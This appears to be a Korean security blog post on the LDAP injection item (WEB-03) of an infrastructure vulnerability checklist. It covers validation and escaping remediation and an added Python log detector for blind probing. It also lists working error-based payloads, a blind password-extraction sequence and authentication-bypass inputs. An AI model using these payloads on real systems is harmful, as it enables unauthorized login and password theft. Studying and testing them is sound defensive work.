
Critical Information and Communications Infrastructure (주요정보통신기반시설) WEB-03 LDAP Injection

WEB-03 LDAP Injection

An attack in which LDAP statements are built from unvalidated user input and used to abuse a web-based application.

 

Check and Judgment Criteria

- Good : input used in LDAP queries is validated, so a tampered query is not executed

- Vulnerable : input used in LDAP queries is not validated, so a tampered query is executed

 

Remediation

- Accept only a defined set of strings as input, and implement validation logic for any user input that reaches an LDAP query

 

Check Method

- Submit a tampered LDAP query to any part of the web site that accepts user-supplied parameters (login form, URL parameters, etc.) and confirm whether it is executed

 

Security Configuration Method

- Define a whitelist for user input values and allow only English letters and digits

- Strip special characters from user input that is used in DNs and filters, so that none remain

- Where special characters must be accepted, process them so that they are interpreted as ordinary literal characters rather than as executable filter syntax (escaping)

 

Error based

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Blind

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
(&(sn=administrator)(password=MY*))  : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK
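The blind sequence above leaves a distinctive trace on the directory side: one connection issuing many searches whose filter matches a password attribute against a growing substring wildcard. The following added example (not code from the original post) shows how a defender can flag that pattern in server logs. The log lines are constructed samples modelled on the `conn=... op=... SRCH base=... filter=...` shape of OpenLDAP slapd's stats logging, and the filters are the ones listed on this page; the regular expression, the attribute set `SENSITIVE_ATTRS` and the per-connection threshold are assumptions to adjust for a real deployment.

```python
import re
from collections import Counter

# Attributes whose values should never be substring-matched by a client-built filter.
SENSITIVE_ATTRS = {"userpassword", "password", "unicodepwd"}

# Search line shape assumed here (modelled on slapd stats logging).
SRCH_RE = re.compile(r'conn=(\d+) op=\d+ SRCH base="[^"]*" scope=\d deref=\d filter="([^"]*)"')
LEAF_RE = re.compile(r"\((\w+)=([^()]*)\)")

# Constructed sample log: conn=1001 replays the blind prefix probing from this page,
# conn=1002 and conn=1003 are ordinary searches that must not be flagged.
SAMPLE_LOG = """\
May 10 12:00:01 ldap slapd[4242]: conn=1001 op=3 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(sn=administrator)(password=*))"
May 10 12:00:01 ldap slapd[4242]: conn=1001 op=4 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(sn=administrator)(password=A*))"
May 10 12:00:02 ldap slapd[4242]: conn=1001 op=5 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(sn=administrator)(password=M*))"
May 10 12:00:02 ldap slapd[4242]: conn=1001 op=6 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(&(sn=administrator)(password=MY*))"
May 10 12:00:03 ldap slapd[4242]: conn=1002 op=1 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(uid=jdoe)"
May 10 12:00:04 ldap slapd[4242]: conn=1003 op=2 SRCH base="ou=people,dc=example,dc=com" scope=1 deref=0 filter="(&(objectClass=person)(mail=*@example.com))"
"""


def suspicious_searches(log_text: str):
    """Return (conn, attribute, value) for every search leaf that wildcards a sensitive attribute."""
    hits = []
    for line in log_text.splitlines():
        m = SRCH_RE.search(line)
        if not m:
            continue
        conn, ldap_filter = m.groups()
        for attr, value in LEAF_RE.findall(ldap_filter):
            if attr.lower() in SENSITIVE_ATTRS and "*" in value:
                hits.append((conn, attr, value))
    return hits


def enumeration_connections(log_text: str, threshold: int = 3):
    """Connections with at least `threshold` sensitive-wildcard searches: likely blind prefix probing."""
    counts = Counter(conn for conn, _, _ in suspicious_searches(log_text))
    return sorted(conn for conn, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for hit in suspicious_searches(SAMPLE_LOG):
        print("sensitive wildcard search:", hit)
    print("connections to investigate:", enumeration_connections(SAMPLE_LOG))
```

Even a single wildcard match against a password attribute is worth an alert, because no legitimate application builds such a filter; the per-connection count is only there to rank the noisiest sources. The `mail=*@example.com` search is left alone on purpose, since wildcards on non-sensitive attributes are routine.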

 

Exploitation

user  = *)(uid=*))(|(uid=*
pass  = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
user  = admin)(!(&(1=0
pass  = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))

 

Attribute List

userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

 

๋ฐ˜์‘ํ˜•
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.